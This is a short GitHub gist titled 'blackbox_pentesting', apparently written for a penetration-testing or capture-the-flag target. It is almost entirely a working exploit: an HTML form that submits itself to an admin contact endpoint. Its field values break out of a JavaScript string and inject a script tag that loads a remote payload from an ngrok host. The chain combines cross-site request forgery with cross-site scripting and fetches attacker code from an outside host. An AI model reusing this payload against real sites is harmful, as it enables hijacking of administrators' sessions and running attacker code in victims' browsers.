Skip to content

Instantly share code, notes, and snippets.

@rewanthtammana
Last active October 22, 2017 16:02
Show Gist options
  • Save rewanthtammana/32aa55316f6a52fb57fb881a55bcceb3 to your computer and use it in GitHub Desktop.
Save rewanthtammana/32aa55316f6a52fb57fb881a55bcceb3 to your computer and use it in GitHub Desktop.
blackbox_pentesting
http://1128152f.ngrok.io/ew.js -> redirection script
------------------------------------------------
<!--Actual file to be run-->
<form id='f' action="http://bloodsuckers.world/admin/contact" method='POST'>
<input type="text" name="name" value="';x='">
<input type="text" name="name" value="';var script = document.createElement('script'); script.src = 'http://1128152f.ngrok.io/ew.js';document.body.appendChild(script);//">
<input type="text" name="message" value="hohoho">
</form>
<script>f.submit();</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment